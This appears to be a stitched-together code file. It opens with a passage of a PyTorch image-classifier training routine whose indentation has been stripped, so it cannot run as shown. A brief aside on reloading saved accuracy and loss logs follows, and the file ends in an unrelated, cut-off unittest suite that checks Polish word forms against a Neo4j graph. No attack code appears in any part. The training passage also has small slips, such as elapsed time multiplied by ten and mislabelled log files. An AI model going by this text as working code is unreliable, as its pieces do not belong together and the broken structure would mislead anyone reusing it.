self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
current_iter += 1;
if(current_iter >= required_iters):
break;
total_time_per_epoch = (time.time() - since)*10;
return total_time_per_epoch;
###############################################################################################################################################
###############################################################################################################################################
@accepts("self", post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def set_training_final(self):
'''
Main training function
Args:
None
Returns:
None
'''
if(self.system_dict["states"]["resume_train"]):
self.custom_print("Training Resume");
total_time_per_epoch = 0;
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
self.system_dict["training"]["status"] = False;
pid = os.getpid();
if(self.system_dict["training"]["settings"]["save_training_logs"]):
val_acc_history = list(np.load(self.system_dict["log_dir"] + "val_acc_history.npy", allow_pickle=True));
train_acc_history = list(np.load(self.system_dict["log_dir"] + "train_acc_history.npy", allow_pickle=True));
val_loss_history = list(np.load(self.system_dict["log_dir"] + "val_loss_history.npy", allow_pickle=True));
train_loss_history = list(np.load(self.system_dict["log_dir"] + "train_loss_history.npy", allow_pickle=True));
            best_acc = 0.0;
            best_loss = 1000.0;
best_acc_epoch = 0;
max_gpu_usage = 0;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
for epoch in range(self.system_dict["hyper-parameters"]["num_epochs"]):
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Epoch {}/{}'.format(epoch+1, self.system_dict["hyper-parameters"]["num_epochs"]))
self.custom_print(' ' + '-' * 10)
if(epoch < self.system_dict["training"]["outputs"]["epochs_completed"]):
self.custom_print("Skipping Current Epoch");
self.custom_print("");
self.custom_print("");
continue;
since = time.time();
for phase in ['train', 'val']:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar=tqdm(total=len(self.system_dict["local"]["data_loaders"][phase]));
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
total_labels = 0
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar.update();
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
if(self.system_dict["dataset"]["label_type"] == "single"):
running_corrects += torch.sum(preds == labels.data)
else:
labels = labels.cpu().detach().numpy()[0]
list_classes = [];
list_labels = [];
raw_scores = outputs.cpu().detach().numpy()[0];
for i in range(len(raw_scores)):
prob = logistic.cdf(raw_scores[i])
if(prob > 0.5):
list_classes.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(labels)):
if(labels[i]):
list_labels.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(list_labels)):
actual = list_labels[i];
if actual in list_classes:
correct = True;
else:
correct = False;
index = self.system_dict["dataset"]["params"]["classes"].index(actual);
total_labels += 1;
if(correct):
running_corrects += 1;
epoch_loss = running_loss / len(self.system_dict["local"]["data_loaders"][phase].dataset)
if(self.system_dict["dataset"]["label_type"] == "single"):
epoch_acc = running_corrects.double() / len(self.system_dict["local"]["data_loaders"][phase].dataset)
else:
epoch_acc = running_corrects/total_labels;
if(not os.getcwd() == "/kaggle/working"):
if(self.system_dict["model"]["params"]["use_gpu"]):
GPUs = GPUtil.getGPUs()
gpuMemoryUsed = GPUs[0].memoryUsed
if(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] < int(gpuMemoryUsed)):
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = int(gpuMemoryUsed);
else:
gpuMemoryUsed = 0;
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = 0;
if(self.system_dict["training"]["settings"]["save_training_logs"]):
if(self.system_dict["dataset"]["label_type"] == "single"):
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc.cpu().detach().numpy());
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc.cpu().detach().numpy());
train_loss_history.append(epoch_loss);
else:
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc);
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc);
train_loss_history.append(epoch_loss);
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] +
self.system_dict["training"]["settings"]["intermediate_model_prefix"] + "{}".format(epoch));
if(self.system_dict["dataset"]["label_type"] == "single"):
if(val_acc > best_acc):
best_acc = val_acc;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
else:
if(val_loss < best_loss):
best_loss = val_loss;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
if(val_acc > best_acc):
best_acc = val_acc;
time_elapsed_since = time.time() - since;
if("training_time" in self.system_dict["training"]["outputs"].keys()):
minutes, seconds = self.system_dict["training"]["outputs"]["training_time"].split(" ");
minutes = int(minutes[:len(minutes)-1]);
seconds = int(seconds[:len(seconds)-1]);
time_elapsed_since += minutes*60 + seconds;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
if(self.system_dict["training"]["settings"]["save_training_logs"]):
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "resume_state");
if(self.system_dict["local"]["learning_rate_scheduler"]):
if(self.system_dict["hyper-parameters"]["learning_rate_scheduler"]["name"] == "reduceonplateaulr"):
self.system_dict["local"]["learning_rate_scheduler"].step(epoch_loss);
else:
self.system_dict["local"]["learning_rate_scheduler"].step();
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
self.custom_print("");
self.custom_print("");
if(self.system_dict["training"]["settings"]["display_progress"]):
for param_group in self.system_dict["local"]["optimizer"].param_groups:
curr_lr = param_group['lr'];
self.custom_print(" curr_lr - {}".format(curr_lr));
                    self.custom_print(' [Epoch %d] Train-acc: %.3f, Train-loss: %.3f | Val-acc: %.3f, Val-loss: %.3f, | time: %.1f sec' %
(epoch+1, train_acc, train_loss, val_acc, val_loss, time.time() - since));
self.custom_print("");
self.system_dict["training"]["outputs"]["epochs_completed"] = epoch+1;
save(self.system_dict);
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Training completed in: {:.0f}m {:.0f}s'.format(time_elapsed_since // 60, time_elapsed_since % 60))
self.custom_print(' Best val Acc: {:4f}'.format(best_acc))
self.custom_print("");
elif(self.system_dict["states"]["eval_infer"]):
msg = "Cannot train in testing (eval_infer) mode.\n";
msg += "Tip - use new_experiment function with a copy_from argument.\n";
raise ConstraintError(msg);
else:
self.custom_print("Training Start");
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
self.system_dict["training"]["status"] = False;
pid = os.getpid();
if(self.system_dict["training"]["settings"]["save_training_logs"]):
val_acc_history = [];
train_acc_history = [];
val_loss_history = [];
train_loss_history = [];
num_batch_train = len(self.system_dict["local"]["data_loaders"]["train"]);
num_batch_val = len(self.system_dict["local"]["data_loaders"]["val"]);
best_acc = 0.0;
best_loss = 1000.0;
best_acc_epoch = 0;
max_gpu_usage = 0;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
for epoch in range(self.system_dict["hyper-parameters"]["num_epochs"]):
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Epoch {}/{}'.format(epoch+1, self.system_dict["hyper-parameters"]["num_epochs"]))
self.custom_print(' ' + '-' * 10)
since = time.time();
for phase in ['train', 'val']:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar=tqdm(total=len(self.system_dict["local"]["data_loaders"][phase]));
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
total_labels = 0
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar.update();
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
if(self.system_dict["dataset"]["label_type"] == "single"):
running_corrects += torch.sum(preds == labels.data)
else:
labels = labels.cpu().detach().numpy()[0]
list_classes = [];
list_labels = [];
raw_scores = outputs.cpu().detach().numpy()[0];
for i in range(len(raw_scores)):
prob = logistic.cdf(raw_scores[i])
if(prob > 0.5):
list_classes.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(labels)):
if(labels[i]):
list_labels.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(list_labels)):
actual = list_labels[i];
if actual in list_classes:
correct = True;
else:
correct = False;
index = self.system_dict["dataset"]["params"]["classes"].index(actual);
total_labels += 1;
if(correct):
running_corrects += 1;
epoch_loss = running_loss / len(self.system_dict["local"]["data_loaders"][phase].dataset)
if(self.system_dict["dataset"]["label_type"] == "single"):
epoch_acc = running_corrects.double() / len(self.system_dict["local"]["data_loaders"][phase].dataset);
else:
epoch_acc = running_corrects/total_labels;
if(not os.getcwd() == "/kaggle/working"):
if(self.system_dict["model"]["params"]["use_gpu"]):
GPUs = GPUtil.getGPUs()
gpuMemoryUsed = GPUs[0].memoryUsed
if(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] < int(gpuMemoryUsed)):
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = int(gpuMemoryUsed);
else:
gpuMemoryUsed = 0;
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = 0;
if(self.system_dict["training"]["settings"]["save_training_logs"]):
if(self.system_dict["dataset"]["label_type"] == "single"):
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc.cpu().detach().numpy());
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc.cpu().detach().numpy());
train_loss_history.append(epoch_loss);
else:
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc);
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc);
train_loss_history.append(epoch_loss);
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] +
self.system_dict["training"]["settings"]["intermediate_model_prefix"] + "{}".format(epoch));
if(self.system_dict["dataset"]["label_type"] == "single"):
if(val_acc > best_acc):
best_acc = val_acc;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
else:
if(val_loss < best_loss):
best_loss = val_loss;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
if(val_acc > best_acc):
best_acc = val_acc;
time_elapsed_since = time.time() - since;
if("training_time" in self.system_dict["training"]["outputs"].keys()):
minutes, seconds = self.system_dict["training"]["outputs"]["training_time"].split(" ");
minutes = int(minutes[:len(minutes)-1]);
seconds = int(seconds[:len(seconds)-1]);
time_elapsed_since += minutes*60 + seconds;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
if(self.system_dict["training"]["settings"]["save_training_logs"]):
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "resume_state");
if(self.system_dict["local"]["learning_rate_scheduler"]):
if(self.system_dict["hyper-parameters"]["learning_rate_scheduler"]["name"] == "reduceonplateaulr"):
self.system_dict["local"]["learning_rate_scheduler"].step(epoch_loss);
else:
self.system_dict["local"]["learning_rate_scheduler"].step();
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
self.custom_print("");
self.custom_print("");
if(self.system_dict["training"]["settings"]["display_progress"]):
for param_group in self.system_dict["local"]["optimizer"].param_groups:
curr_lr = param_group['lr'];
self.custom_print(" curr_lr - {}".format(curr_lr));
                    self.custom_print(' [Epoch %d] Train-acc: %.3f, Train-loss: %.3f | Val-acc: %.3f, Val-loss: %.3f, | time: %.1f sec' %
(epoch+1, train_acc, train_loss, val_acc, val_loss, time.time() - since));
self.custom_print("");
self.system_dict["training"]["outputs"]["epochs_completed"] = epoch+1;
save(self.system_dict);
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Training completed in: {:.0f}m {:.0f}s'.format(time_elapsed_since // 60, time_elapsed_since % 60))
self.custom_print(' Best val Acc: {:4f}'.format(best_acc))
self.custom_print("");
if(not self.system_dict["states"]["eval_infer"]):
self.custom_print("Training End");
self.custom_print("");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
self.system_dict["training"]["outputs"]["max_gpu_usage"] = str(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"]) + " Mb";
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "final");
if(self.system_dict["training"]["settings"]["save_training_logs"]):
self.custom_print("Training Outputs");
self.custom_print(" Model Dir: {}".format(self.system_dict["model_dir"]));
self.custom_print(" Log Dir: {}".format(self.system_dict["log_dir"]));
self.custom_print(" Final model: {}".format("final"));
self.custom_print(" Best model: {}".format("best_model"));
self.custom_print(" Log 1 - Validation accuracy history log: {}".format("val_acc_history.npy"));
self.custom_print(" Log 2 - Validation loss history log: {}".format("val_loss_history.npy"));
self.custom_print(" Log 3 - Training accuracy history log: {}".format("train_acc_history.npy"));
self.custom_print(" Log 4 - Training loss history log: {}".format("train_loss_history.npy"));
self.custom_print(" Log 5 - Training curve: {}".format("train_loss_history.npy"));
self.custom_print(" Log 6 - Validation curve: {}".format("train_loss_history.npy"));
self.custom_print("");
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
self.system_dict["training"]["outputs"]["log_val_acc_history"] = self.system_dict["log_dir"] + "val_acc_history.npy";
self.system_dict["training"]["outputs"]["log_val_loss_history"] = self.system_dict["log_dir"] + "val_loss_history.npy";
self.system_dict["training"]["outputs"]["log_train_acc_history"] = self.system_dict["log_dir"] + "train_acc_history.npy";
self.system_dict["training"]["outputs"]["log_train_loss_history"] = self.system_dict["log_dir"] + "train_loss_history.npy";
self.system_dict["training"]["outputs"]["log_val_acc_history_relative"] = self.system_dict["log_dir_relative"] + "val_acc_history.npy";
self.system_dict["training"]["outputs"]["log_val_loss_history_relative"] = self.system_dict["log_dir_relative"] + "val_loss_history.npy";
self.system_dict["training"]["outputs"]["log_train_acc_history_relative"] = self.system_dict["log_dir_relative"] + "train_acc_history.npy";
self.system_dict["training"]["outputs"]["log_train_loss_history_relative"] = self.system_dict["log_dir_relative"] + "train_loss_history.npy";
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
self.system_dict["training"]["status"] = True;
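The four `np.save` calls above persist the accuracy/loss histories as `.npy` arrays in `log_dir`. A minimal sketch (hypothetical directory and values, not part of the class above) of writing and reloading one such log the same way:

```python
import os
import tempfile
import numpy as np

# Hypothetical log directory and validation-accuracy history.
log_dir = tempfile.mkdtemp() + os.sep
val_acc_history = [0.61, 0.67, 0.72, 0.70]

# Save exactly as the training code does, then reload for inspection.
np.save(log_dir + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True)
loaded = np.load(log_dir + "val_acc_history.npy", allow_pickle=True)

best_epoch = int(loaded.argmax())
print(best_epoch, float(loaded.max()))  # prints: 2 0.72
```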
###############################################################################################################################################
# -*- coding: utf-8 -*-
# tests/neo4j/polish.py, from the perfidia/andip repository (MIT license)
import os
import unittest
from andip import FileProvider
from andip.neo4j import Neo4JProvider
class GraphPolishTest(unittest.TestCase):

    @classmethod
    def setUpClass(cls):
        # Trim the current working directory down to the 'andip' project root,
        # then point the file-based oracle at data/polish.
        path = os.getcwd().split(os.sep)
        for d in reversed(path[:]):
            if d != 'andip':
                path.pop()
                continue
            break
        path.append('data')
        path.append('polish')
        cls.oracle = FileProvider(os.sep.join(path))

        # Rebuild the Neo4j graph from the same data set and connect to it.
        conf = "http://localhost:7474/db/data/"
        data = eval(open("%s.txt" % os.sep.join(path)).read())
        provider = Neo4JProvider(conf)
        provider.dropAll()
        provider.importData(data)
        provider.connect()
        cls.graph = provider

    def testGetWordPronoun(self):
        self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'})))
        self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'})))

    def testGetWordVerb(self):
        self.assertEqual(self.oracle.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})), self.graph.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})))
        self.assertEqual(self.oracle.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))
        self.assertEqual(self.oracle.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})), self.graph.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})))
        self.assertEqual(self.oracle.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))
        self.assertEqual(self.oracle.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'})))
        self.assertEqual(self.oracle.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))

    def testGetWordPreposition(self):
        self.assertEqual(self.oracle.get_word(('przyimek', 'z', {'forma': 'z'})), self.graph.get_word(('przyimek', 'z', {'forma': 'z'})))
        self.assertEqual(self.oracle.get_word(('przyimek', 'z', {'forma': 'ze'})), self.graph.get_word(('przyimek', 'z', {'forma': 'ze'})))

    def testGetWordAdjective(self):
        self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'm'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'm'})))
        self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'})))
        self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'ż'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'ż'})))
        self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'})))

    def testGetWordNoun(self):
        self.assertEqual(self.oracle.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'})), self.graph.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'})))
        self.assertEqual(self.oracle.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'mnoga'})), self.graph.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'mnoga'})))

    def testGetConfPronoun(self):
        self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'}), self.graph.get_conf('niej'))
        self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('nim'))
        self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('nich'))
        self.assertEqual(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('on')[0])
        self.assertEqual(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'}), self.graph.get_conf('ona')[0])
        self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'}), self.graph.get_conf('której'))
        self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'}), self.graph.get_conf('którym'))
        self.assertIn(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'}), self.graph.get_conf('których'))

    def testGetConfVerb(self):
        self.assertIn(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'}), self.graph.get_conf('następuje'))
        self.assertIn(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'}), self.graph.get_conf('następują'))
        self.assertIn(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'}), self.graph.get_conf('występuje'))
